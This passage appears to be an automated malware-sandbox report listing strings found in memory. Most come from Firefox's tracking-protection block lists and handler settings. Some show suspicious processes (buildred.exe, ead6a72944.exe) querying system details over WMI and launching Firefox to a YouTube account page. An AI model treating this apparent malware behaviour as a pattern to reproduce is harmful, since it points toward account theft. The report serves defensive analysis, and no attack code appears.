Source: firefox.exe, 00000028.00000002.2878694022.0000026181C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exehttps://www.youtube.com/account< equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000002.2738774897.000001E539250000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Windows\system32\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"winsta0\default equals www.youtube.com (Youtube)
Source: firefox.exe, 00000027.00000002.2761056031.0000025949DA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Windows\system32\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevationC:\Program Files\Mozilla Firefox\firefox.exeWinsta0\DefaultH equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2878694022.0000026181C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Windows\system32\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/accountC:\Program Files\Mozilla Firefox\firefox.exeWinsta0\Default; equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: JSON Viewer's onSave failed in startPersistenceFailed to listen. Callback argument missing.devtools.performance.popup.feature-flagdevtools/client/framework/devtools-browserdevtools.debugger.features.javascript-tracing{9e9a9283-0ce9-4e4a-8f1c-ba129a032c32}Failed to execute WebChannel callback:No callback set for this channel.and deploy previews URLs are allowed.WebChannel/this._originCheckCallbackresource://devtools/shared/security/socket.js@mozilla.org/network/protocol;1?name=default@mozilla.org/network/protocol;1?name=file@mozilla.org/uriloader/handler-service;1browser.fixup.dns_first_for_single_wordsbrowser.urlbar.dnsResolveFullyQualifiedNamesdevtools-commandkey-javascript-tracing-toggleGot invalid request to save JSON datadevtools/client/framework/devtoolsreleaseDistinctSystemPrincipalLoaderUnable to start devtools server on devtools-commandkey-profiler-capture@mozilla.org/dom/slow-script-debug;1DevTools telemetry entry point failed: Failed to listen. Listener already attached.browser and that URL. Falling back to ^(?<url>\w+:.+):(?<line>\d+):(?<column>\d+)$DevToolsStartup.jsm:handleDebuggerFlagdevtools.debugger.remote-websocketdevtools-commandkey-profiler-start-stopdevtools.performance.recording.ui-base-urlresource://devtools/server/devtools-server.jsgecko.handlerService.defaultHandlersVersionhttp://compose.mail.yahoo.co.jp/ym/Compose?To=%shttp://www.inbox.lv/rfc2368/?value=%shttps://poczta.interia.pl/mh/?mailto=%s@mozilla.org/uriloader/local-handler-app;1@mozilla.org/uriloader/web-handler-app;1https://e.mail.ru/cgi-bin/sentmsg?mailto=%s@mozilla.org/uriloader/dbus-handler-app;1resource://gre/modules/DeferredTask.sys.mjs_injectDefaultProtocolHandlersIfNeededresource://gre/modules/FileUtils.sys.mjs^([a-z+.-]+:\/{0,3})([^\/@]+@).+^([a-z][a-z0-9.+\t-])(:\|;)?(\/\/)?resource://gre/modules/NetUtil.sys.mjshttps://mail.yahoo.co.jp/compose/?To=%s{33d75835-722f-42c0-89cc-44f328e56a86}http://win.mail.ru/cgi-bin/sentmsg?mailto=%sbrowser.fixup.domainsuffixwhitelist.get FIXUP_FLAG_ALLOW_KEYWORD_LOOKUPget FIXUP_FLAG_FORCE_ALTERNATE_URIhttps://mail.inbox.lv/compose?to=%shttp://poczta.interia.pl/mh/?mailto=%sget FIXUP_FLAGS_MAKE_ALTERNATE_URICan't invoke URIFixup in the content processresource://gre/modules/FileUtils.sys.mjs^[a-z0-9-]+(\.[a-z0-9-]+)*:[0-9]{1,5}([/?#]\|$)extractScheme/fixupChangedProtocol<isDownloadsImprovementsAlreadyMigratedhandlerSvc fillHandlerInfo: don't know this typeScheme should be either http or https{c6cf88b7-452e-47eb-bdc9-86e3561648ef}resource://gre/modules/JSONFile.sys.mjs@mozilla.org/network/file-input-stream;1_finalizeInternal/this._finalizePromise<resource://gre/modules/DeferredTask.sys.mjsresource://gre/modules/ExtHandlerService.sys.mjs@mozilla.org/network/async-stream-copier;1Must have a source and a callbacknewChannel requires a single object argumentFirst argument should be an nsIInputStreamresource://gre/modules/JSONFile.sys.mjs@mozilla.org/network/input-stream-pump;1SEC_ALLOW_CROSS_ORIGIN_SEC_CONTEXT_IS_NULLNon-zero amoun
Source: firefox.exe, 00000028.00000002.2881327122.00000261842A5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751223783.00000261842B5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751624555.00000261842B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2881327122.00000261842A5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751223783.00000261842B5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751624555.00000261842B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/account6 equals www.youtube.com (Youtube)
Source: firefox.exe, 0000002F.00000002.2851889197.00000130BD7D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/account> equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2879465068.0000026181E03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountx equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: PREF_BRANCH_PREVIOUS_ACTIONVALIDATE_FORCE_APPEND_EXTENSION_downloadTypesViewableInternallyshouldViewDownloadInternally_shouldViewDownloadInternally_shouldViewDownloadInternally/<getCombined/overrideFnArray<https://www.youtube.com/accountVALIDATE_GUESS_FROM_EXTENSIONpictureinpicture@mozilla.org equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000002.2738774897.000001E539259000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2760124251.000001E539530000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: URL=https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000002.2738774897.000001E539259000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: URL=https://www.youtube.com/accountj equals www.youtube.com (Youtube)
Source: buildred.exe, 0000001A.00000002.2956306224.000000000854C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Win32_Process7440Win32_Processfirefox.exefirefox.exefirefox.exeWin32_ComputerSystemuser-PCWin32_OperatingSystem10.0.19045Microsoft Windows 10 Pro\|C:\Windows\|\Device\Harddisk0\Partition320240726165726.463452+060C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account" equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2922562667.0000026194612000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ["://track.adform.net/Serving/TrackPoint/", "://pagead2.googlesyndication.com/pagead/.jsfcd=true", "://pagead2.googlesyndication.com/pagead/js/.jsfcd=true", "://pixel.advertising.com/firefox-etp", "://cdn.cmp.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/*"] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000028.00000002.2922562667.000002619460B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ["://track.adform.net/Serving/TrackPoint/", "://pixel.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/"] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000028.00000002.2890262949.000002618F240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ["://webcompat-addon-testbed.herokuapp.com/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js", "://track.adform.net/serving/scripts/trackpoint/", "://track.adform.net/serving/scripts/trackpoint/async/", "://.adnxs.com//ast.js", "://.adnxs.com//pb.js", "://.adnxs.com//prebid", "://www.everestjs.net/static/st.v3.js", "://static.adsafeprotected.com/vans-adapter-google-ima.js", "://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "://cdn.branch.io/branch-latest.min.js", "://pub.doubleverify.com/signals/pub.js", "://c.amazon-adsystem.com/aax2/apstag.js", "://auth.9c9media.ca/auth/main.js", "://static.chartbeat.com/js/chartbeat.js", "://static.chartbeat.com/js/chartbeat_video.js", "://static.criteo.net/js/ld/publishertag.js", "://.imgur.com/js/vendor..bundle.js", "://.imgur.io/js/vendor..bundle.js", "://www.rva311.com/static/js/main..chunk.js", "://web-assets.toggl.com/app/assets/scripts/.js", "://libs.coremetrics.com/eluminate.js", "://connect.facebook.net//sdk.js", "://connect.facebook.net//all.js", "://secure.cdn.fastclick.net/js/cnvr-launcher//launcher-stub.min.js", "://www.google-analytics.com/analytics.js", "://www.google-analytics.com/gtm/js", "://www.googletagmanager.com/gtm.js", "://www.google-analytics.com/plugins/ua/ec.js", "://ssl.google-analytics.com/ga.js", "://s0.2mdn.net/instream/html5/ima3.js", "://imasdk.googleapis.com/js/sdkloader/ima3.js", "://www.googleadservices.com/pagead/conversion_async.js", "://www.googletagservices.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/gpt/pubads_impl_.js", "://securepubads.g.doubleclick.net/tag/js/gpt.js", "://securepubads.g.doubleclick.net/gpt/pubads_impl_.js", "://script.ioam.de/iam.js", "://cdn.adsafeprotected.com/iasPET.1.js", "://static.adsafeprotected.com/iasPET.1.js", "://adservex.media.net/videoAds.js", "://.moatads.com//moatad.js", "://.moatads.com//moatapi.js", "://.moatads.com//moatheader.js", "://.moatads.com//yi.js", "://.imrworldwide.com/v60.js", "://cdn.optimizely.com/js/.js", "://cdn.optimizely.com/public/.js", "://id.rambler.ru/rambler-id-helper/auth_events.js", "://media.richrelevance.com/rrserver/js/1.2/p13n.js", "://www.gstatic.com/firebasejs//firebase-messaging.js", "://.vidible.tv//vidible-min.js", "://vdb-cdn-files.s3.amazonaws.com//vidible-min.js", "://js.maxmind.com/js/apis/geoip2//geoip2.js", "://s.webtrends.com/js/advancedLinkTracking.js", "://s.webtrends.com/js/webtrends.js", "://s.webtrends.com/js/webtrends.min.js"] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000028.00000002.2890262949.000002618F240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ["://webcompat-addon-testbed.herokuapp.com/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js", "://track.adform.net/serving/scripts/trackpoint/", "://track.adform.net/serving/scripts/trackpoint/async/", "://.adnxs.com//ast.js", "://.adnxs.com//pb.js", "://.adnxs.com//prebid", "://www.everestjs.net/static/st.v3.js", "://static.adsafeprotected.com/vans-adapter-google-ima.js", "://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "://cdn.branch.io/branch-latest.min.js", "://pub.doubleverify.com/signals/pub.js", "://c.amazon-adsystem.com/aax2/apstag.js", "://auth.9c9media.ca/auth/main.js", "://static.chartbeat.com/js/chartbeat.js", "://static.chartbeat.com/js/chartbeat_video.js", "://static.criteo.net/js/ld/publishertag.js", "://.imgur.com/js/vendor..bundle.js", "://.imgur.io/js/vendor..bundle.js", "://www.rva311.com/static/js/main..chunk.js", "://web-assets.toggl.com/app/assets/scripts/.js", "://libs.coremetrics.com/eluminate.js", "://connect.facebook.net//sdk.js", "://connect.facebook.net//all.js", "://secure.cdn.fastclick.net/js/cnvr-launcher//launcher-stub.min.js", "://www.google-analytics.com/analytics.js", "://www.google-analytics.com/gtm/js", "://www.googletagmanager.com/gtm.js", "://www.google-analytics.com/plugins/ua/ec.js", "://ssl.google-analytics.com/ga.js", "://s0.2mdn.net/instream/html5/ima3.js", "://imasdk.googleapis.com/js/sdkloader/ima3.js", "://www.googleadservices.com/pagead/conversion_async.js", "://www.googletagservices.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/gpt/pubads_impl_.js", "://securepubads.g.doubleclick.net/tag/js/gpt.js", "://securepubads.g.doubleclick.net/gpt/pubads_impl_.js", "://script.ioam.de/iam.js", "://cdn.adsafeprotected.com/iasPET.1.js", "://static.adsafeprotected.com/iasPET.1.js", "://adservex.media.net/videoAds.js", "://.moatads.com//moatad.js", "://.moatads.com//moatapi.js", "://.moatads.com//moatheader.js", "://.moatads.com//yi.js", "://.imrworldwide.com/v60.js", "://cdn.optimizely.com/js/.js", "://cdn.optimizely.com/public/.js", "://id.rambler.ru/rambler-id-helper/auth_events.js", "://media.richrelevance.com/rrserver/js/1.2/p13n.js", "://www.gstatic.com/firebasejs//firebase-messaging.js", "://.vidible.tv//vidible-min.js", "://vdb-cdn-files.s3.amazonaws.com//vidible-min.js", "://js.maxmind.com/js/apis/geoip2//geoip2.js", "://s.webtrends.com/js/advancedLinkTracking.js", "://s.webtrends.com/js/webtrends.js", "://s.webtrends.com/js/webtrends.min.js"] equals www.rambler.ru (Rambler)
Source: firefox.exe, 00000028.00000002.2922562667.0000026194607000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2922562667.000002619460B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["image"], urls:["://track.adform.net/Serving/TrackPoint/", "://pixel.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000028.00000002.2922562667.0000026194607000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["imageset"], urls:["://track.adform.net/Serving/TrackPoint/", "://pixel.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000028.00000002.2890262949.000002618F240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["://webcompat-addon-testbed.herokuapp.com/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js", "://track.adform.net/serving/scripts/trackpoint/", "://track.adform.net/serving/scripts/trackpoint/async/", "://.adnxs.com//ast.js", "://.adnxs.com//pb.js", "://.adnxs.com//prebid", "://www.everestjs.net/static/st.v3.js", "://static.adsafeprotected.com/vans-adapter-google-ima.js", "://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "://cdn.branch.io/branch-latest.min.js", "://pub.doubleverify.com/signals/pub.js", "://c.amazon-adsystem.com/aax2/apstag.js", "://auth.9c9media.ca/auth/main.js", "://static.chartbeat.com/js/chartbeat.js", "://static.chartbeat.com/js/chartbeat_video.js", "://static.criteo.net/js/ld/publishertag.js", "://.imgur.com/js/vendor..bundle.js", "://.imgur.io/js/vendor..bundle.js", "://www.rva311.com/static/js/main..chunk.js", "://web-assets.toggl.com/app/assets/scripts/.js", "://libs.coremetrics.com/eluminate.js", "://connect.facebook.net//sdk.js", "://connect.facebook.net//all.js", "://secure.cdn.fastclick.net/js/cnvr-launcher//launcher-stub.min.js", "://www.google-analytics.com/analytics.js", "://www.google-analytics.com/gtm/js", "://www.googletagmanager.com/gtm.js", "://www.google-analytics.com/plugins/ua/ec.js", "://ssl.google-analytics.com/ga.js", "://s0.2mdn.net/instream/html5/ima3.js", "://imasdk.googleapis.com/js/sdkloader/ima3.js", "://www.googleadservices.com/pagead/conversion_async.js", "://www.googletagservices.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/gpt/pubads_impl_.js", "://securepubads.g.doubleclick.net/tag/js/gpt.js", "://securepubads.g.doubleclick.net/gpt/pubads_impl_.js", "://script.ioam.de/iam.js", "://cdn.adsafeprotected.com/iasPET.1.js", "://static.adsafeprotected.com/iasPET.1.js", "://adservex.media.net/videoAds.js", "://.moatads.com//moatad.js", "://.moatads.com//moatapi.js", "://.moatads.com//moatheader.js", "://.moatads.com//yi.js", "://.imrworldwide.com/v60.js", "://cdn.optimizely.com/js/.js", "://cdn.optimizely.com/public/.js", "://id.rambler.ru/rambler-id-helper/auth_events.js", "://media.richrelevance.com/rrserver/js/1.2/p13n.js", "://www.gstatic.com/firebasejs//firebase-messaging.js", "://.vidible.tv//vidible-min.js", "://vdb-cdn-files.s3.amazonaws.com//vidible-min.js", "://js.maxmind.com/js/apis/geoip2//geoip2.js", "://s.webtrends.com/js/advancedLinkTracking.js", "://s.webtrends.com/js/webtrends.js", "://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 00000028.00000002.2890262949.000002618F240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["://webcompat-addon-testbed.herokuapp.com/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js", "://track.adform.net/serving/scripts/trackpoint/", "://track.adform.net/serving/scripts/trackpoint/async/", "://.adnxs.com//ast.js", "://.adnxs.com//pb.js", "://.adnxs.com//prebid", "://www.everestjs.net/static/st.v3.js", "://static.adsafeprotected.com/vans-adapter-google-ima.js", "://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "://cdn.branch.io/branch-latest.min.js", "://pub.doubleverify.com/signals/pub.js", "://c.amazon-adsystem.com/aax2/apstag.js", "://auth.9c9media.ca/auth/main.js", "://static.chartbeat.com/js/chartbeat.js", "://static.chartbeat.com/js/chartbeat_video.js", "://static.criteo.net/js/ld/publishertag.js", "://.imgur.com/js/vendor..bundle.js", "://.imgur.io/js/vendor..bundle.js", "://www.rva311.com/static/js/main..chunk.js", "://web-assets.toggl.com/app/assets/scripts/.js", "://libs.coremetrics.com/eluminate.js", "://connect.facebook.net//sdk.js", "://connect.facebook.net//all.js", "://secure.cdn.fastclick.net/js/cnvr-launcher//launcher-stub.min.js", "://www.google-analytics.com/analytics.js", "://www.google-analytics.com/gtm/js", "://www.googletagmanager.com/gtm.js", "://www.google-analytics.com/plugins/ua/ec.js", "://ssl.google-analytics.com/ga.js", "://s0.2mdn.net/instream/html5/ima3.js", "://imasdk.googleapis.com/js/sdkloader/ima3.js", "://www.googleadservices.com/pagead/conversion_async.js", "://www.googletagservices.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/gpt/pubads_impl_.js", "://securepubads.g.doubleclick.net/tag/js/gpt.js", "://securepubads.g.doubleclick.net/gpt/pubads_impl_.js", "://script.ioam.de/iam.js", "://cdn.adsafeprotected.com/iasPET.1.js", "://static.adsafeprotected.com/iasPET.1.js", "://adservex.media.net/videoAds.js", "://.moatads.com//moatad.js", "://.moatads.com//moatapi.js", "://.moatads.com//moatheader.js", "://.moatads.com//yi.js", "://.imrworldwide.com/v60.js", "://cdn.optimizely.com/js/.js", "://cdn.optimizely.com/public/.js", "://id.rambler.ru/rambler-id-helper/auth_events.js", "://media.richrelevance.com/rrserver/js/1.2/p13n.js", "://www.gstatic.com/firebasejs//firebase-messaging.js", "://.vidible.tv//vidible-min.js", "://vdb-cdn-files.s3.amazonaws.com//vidible-min.js", "://js.maxmind.com/js/apis/geoip2//geoip2.js", "://s.webtrends.com/js/advancedLinkTracking.js", "://s.webtrends.com/js/webtrends.js", "://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 00000028.00000002.2922562667.000002619460B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["xmlhttprequest"], urls:["://track.adform.net/Serving/TrackPoint/", "://pagead2.googlesyndication.com/pagead/.jsfcd=true", "://pagead2.googlesyndication.com/pagead/js/.jsfcd=true", "://pixel.advertising.com/firefox-etp", "://cdn.cmp.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000002F.00000002.2851889197.00000130BD7DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: efox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/acc equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000002.2738774897.000001E539259000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: empTMP=C:\Users\user\AppData\Local\TempURL=https://www.youtube.com/accountUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%shttp://www.inbox.lv/rfc2368/?value=%s equals www.yahoo.com (Yahoo)
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://en.wikipedia.org/wiki/Special:Search://www.facebook.com/platform/impression.php://.adsafeprotected.com//unit/*sessionstore-final-state-write-complete equals www.facebook.com (Facebook)
Source: firefox.exe, 00000028.00000002.2931107138.0000026194CDE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2931107138.0000026194CDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191E7F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F2EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: ead6a72944.exe, 0000001C.00000003.2704365877.0000000002117000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/account" equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2879465068.0000026181E03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/account`T equals www.youtube.com (Youtube)
